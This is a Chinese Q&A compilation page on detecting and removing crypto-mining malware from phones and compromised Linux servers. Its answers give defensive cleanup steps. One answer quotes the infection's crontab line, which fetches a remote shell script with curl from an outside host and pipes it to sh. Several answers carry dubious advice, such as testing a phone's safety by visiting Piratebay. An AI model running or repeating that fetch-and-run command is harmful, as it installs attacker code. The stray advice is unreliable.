當前位置:首頁 » 挖礦知識 » 怎麼消除挖礦程序

怎麼消除挖礦程序

發布時間: 2023-03-25 15:46:34

❶ 如何清理手機挖礦程序

手機徹底恢復成出場模式,清理掉所有安裝消耗手機性能的東西。

❷ 怎樣 刪除 mineros.exe 這種挖礦程序

最近一台安裝了Gitlab的伺服器發生了高負載告警,Cpu使用情況如下:

讓後登錄到伺服器,利用top查看CPU使用情況,這個叫minerd的程序消耗cpu較大,如下圖所示:

這個程序並不是我們的正常服務程序,心裡一想肯定被黑了,然後就搜索了一下這個程序,果真就是個挖礦木馬程序,既然已經知道他是木馬程序,那就看看它是怎麼工作的,然後怎麼修復一下後門。

這個程序放在/opt/minerd下,在確定跟項目不相關的情況下判斷是個木馬程序,果斷kill掉進程,然後刪除/opt下minerd文件。

❸ tasklsv.exe挖礦病毒如何徹底清除

請勿訪問陌生網站,在陌生網站瀏覽、下載很可能導致中毒。

  1. 若電腦中存在木馬或者病毒程序,安裝一款安全軟體(例如:電腦管家等)。使用安全軟體進行掃描全盤即可發現病毒並刪除。若無法處理或者出現錯誤請嘗試備份重要資料後重新安裝系統。

  2. 若手機中存在木馬或者病毒程序,安裝一款安全軟體(例如:手機管家等)。以手機管家為例,打開手機管家,點擊主界面上的一鍵體檢即可自動檢測手機中存在的病毒,點擊一鍵清除即可刪除。

❹ 手機被挖礦怎麼辦

可以使用設備訪問檢測網站(例如 Piratebay)來確認其安全性。

雖然 Chrome 是最常用的瀏覽器,但是 Opera 瀏覽器提供了一些 Chrome 沒有的有趣功能。最新版本的 Opera 瀏覽器能夠自動攔截廣告,此外,它還內置了阻止挖礦的防護功能。這一功能可以阻止網站擅自運行非法挖礦的腳本,這與網頁上的廣告攔截技術並沒有太大區別。

相關信息:

「偷礦」是指未經你同意的情況下,黑客利用你的系統資源挖掘虛擬貨幣。這主要藉助於網站的 Java 代碼,黑客在代碼中注入「偷礦」程序,當你訪問這些代碼時,「偷礦」程序便會偷偷自動運行。

雖然黑客能夠主動入侵網站來運行挖礦腳本,但需要注意的是,那些使用了類似 Coinhive.com 這種插件服務的網站無意中也會給黑客提供更多的可乘之機。

❺ IP地址被疑挖礦怎麼辦

1、首先使用find命令在IP地址中找到kdevtmpfsi進程的位置。
2、其次利用這個進程找到挖礦程序的守護進程並kill它,刪除守護進程的文件,刪除挖礦程序的所有文件。
3、最後殺死挖礦進程並刪除它的定時任務即可。

❻ 伺服器被檢測出挖礦

有位朋友說,他伺服器使用的好好的,服務商突然封了他伺服器,說是被檢測出挖礦,這位朋友一臉懵「我開游戲的,挖什麼礦」。突然地關停伺服器導致這位朋友損失慘重,那麼為什麼會被檢測出挖礦,以及怎麼處理呢?感興趣的話就繼續往下看吧~

遇到以上問題,需要先找伺服器商對其說明實際情況,配合他們排查,基本上就是中了挖礦病毒。

最簡單的方法就是重裝系統,但是系統盤數據都會清空,這種辦法適用於伺服器里沒什麼需要備份的文件。如果選擇重裝系統,需要把自己的文件掃毒一遍確認安全後再導入伺服器。

但是伺服器里如果有很多重要的文件還有比較難配置的環境,那就需要排查刪除挖礦程序,全盤掃毒,刪除可疑文件,一個個修復病毒對系統的修改。

防範建議:

1.盡量不要使用默認密碼和埠,改一個比較復雜的密碼

2.可以使用寶塔面板登陸伺服器

3.系統自帶的防火牆、安全防護都不要關閉

❼ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

❽ 記一次清理伺服器挖礦程序注入kdevtmpfs

前幾天突然發現公司伺服器很卡,CPU經常飆到200%;網站服務被自動停止,甚至伺服器崩潰;於是進行排查,發現一個名為:kdevtmpfs的進程佔用了180%多的CPU,嚇了一跳,於是趕緊排查問題:首先查到這個進程並不少我們伺服器用到的進程,於是在網上查找這個問題,發現很多人都遇到過,於是根據網上的一個教程開始清理:

1、刪除掉/tmp文件下的kdevtmpfs文件;刪除掉kdevtmpfs對應的進程,清理掉定時任務;(無效,幾分鍾後依然會自動重啟,自動在定時任務新增定時任務)( https://blog.csdn.net/qq503758762/article/details/103714342 )

2、修改定時任務,不允許新增定時任務,復述1的步驟;(嘩枝無效,依然會自動重新啟動);

3、經歷上述兩個方法都無效之後,做了以下操作:a、先用top命令查看進程號;b、根據systemctl status進程號命令,查看該進程對應的父進程;把對應進程下的程序都幹掉;重復幾次發現都是一個叫做kingsfdt的進程會和這個kdevtmpfs同時啟動;c、查看kingsfdt的進程,亂旅敏發現這也是一個陌生的進程,先不kill掉;d:查看系統防火牆,發現對應的23549埠不知道什麼時候開放的,並且對應的是kingsfdt這個進程,於是果斷把這個進程幹掉,同時把埠號封掉;e、再回頭刪除tmp下的kdevtmpfs文件,再依次刪除兩個陌生進程;f、登錄AWS控制台,把ssh埠改掉,22埠封掉;進入ssh修改root密碼,設定只鎮和能本地登錄;重啟伺服器;觀察了一天,發現服務穩定了,系統也正常運行了,CPU也正常了。開心。

❾ 伺服器被攻擊並植入kdevtmpfsi挖礦/病毒/木馬

MongoDB庫中的數據莫名其妙沒有了,發覺如下信息:

1、 top -d 5命令 ,查看系統負載情況、是否有未知進程,發現一個名為kdevtmpfsi的進程,經科普它是一個挖礦程序,會佔用伺服器高額的CPU、內存資源。如圖,CPU佔用率高達788.7%,而且是yarn用戶下:

2、 ps -ef |grep kdevtmpfsi 命令查看 該挖礦程序路徑:/tmp/kdevtmpfsi

3、 ps -ef |grep yarn 命令查看更多關於yarn相關進程信息(此時我的伺服器並沒有開啟yarn服務,如果有yarn的相關進程則可判斷是攻擊者開啟的進程),發現另外還有個kinsing進程,經科普kinsing進程是kdevtmpfsi的守護進程:

4、 netstat -lntupaa 命令查看是否有異常的ip,果然發現194.87.102.77這個陌生的ip,判斷是kdevtmpfsi的發出者:

5、經查詢該ip的所在國家是俄羅斯:

6、 find / -iname kdevtmpfsi 命令再次確定命令所在位置以便刪除:

7、 cd /tmp 進入相關目錄:

8、 rm -rf kdevtmpfsi 刪除kdevtmpfsi程序:

9、** kill -9 40422**殺掉kdevtmpfsi進程:

10、發現並沒殺掉所有kdevtmpfsi進程,再次查找yarn的相關進程(因為之前已確認病毒是在yarn下),果真還有kdevtmpfsi進程存在:

11、用命令 批量殺掉 相關進程:

12、刪除kinsing文件:

13、現在,已經把挖礦程序及相關進程刪除掉了,但是還有兩處沒做處理:

14、 crontab -l 命令先看看crontab的定時任務列表吧:

15、編寫刪除挖礦程序腳本 kill_kdevtmpfsi.sh

16、新增 定時任務 並刪除攻擊者的挖礦定時任務:

17、 crontab -l命令 查看現在只有殺進程的定時任務了:

18、禁止黑客的IP地址。

最初安裝MongoDB時,並未設置密碼認證,存在漏洞,導致黑客通過漏洞攻擊伺服器,並在程序里植入木馬/病毒。單純的kill -9 id殺掉病毒進程是殺不徹底的,治標不治本,應該定時刪除病毒進程,禁止攻擊者IP,重新安裝系統或相關軟體。

經過幾天的觀察,伺服器運行正常,再沒有被黑客攻擊成功。

❿ 挖礦病毒怎麼處理

挖礦病毒處理步驟如下:

1、查看伺服器進程運行狀態查看伺服器系統整體運行情況,發現名為kdevtmpfsi的挖礦進程大量佔用系統CPU使用率。

2、查看埠及外聯情況查看埠開放狀態及外聯情況,發現主機存在陌生外聯行為。對該外部地址進行查詢發現屬於國外地址,進一步確定該進程為惡意挖礦進程:定位挖礦進程及其守護進程PID挖礦病毒kdevtmpfsi在運行過程中不僅會產生進程kdevtmpfsi。

6、查看redis日誌通過查看redis配置文件/etc/redis.conf發現日誌功能未開啟。

7、查找敏感文件發現authorized_keys文件。

8、查看ssh日誌文件查看ssh日誌文件,發現大量登陸痕跡以及公鑰上傳痕跡。

熱點內容
以太坊280x 發布:2025-07-09 23:18:57 瀏覽:719
xrp被盜 發布:2025-07-09 23:18:55 瀏覽:413
btc行情走勢年 發布:2025-07-09 23:14:08 瀏覽:867
幣圈下一次牛市熱點 發布:2025-07-09 22:56:11 瀏覽:708
以太坊發行白皮書 發布:2025-07-09 22:47:54 瀏覽:451
區塊鏈技術開發學習路徑 發布:2025-07-09 22:41:01 瀏覽:13
新晨科技中標銀行區塊鏈 發布:2025-07-09 22:38:22 瀏覽:941
以太坊代幣價格 發布:2025-07-09 22:37:14 瀏覽:172
eth錢包申請視頻 發布:2025-07-09 22:27:49 瀏覽:519
螞蟻z9mini礦機能挖什麼幣 發布:2025-07-09 22:09:54 瀏覽:625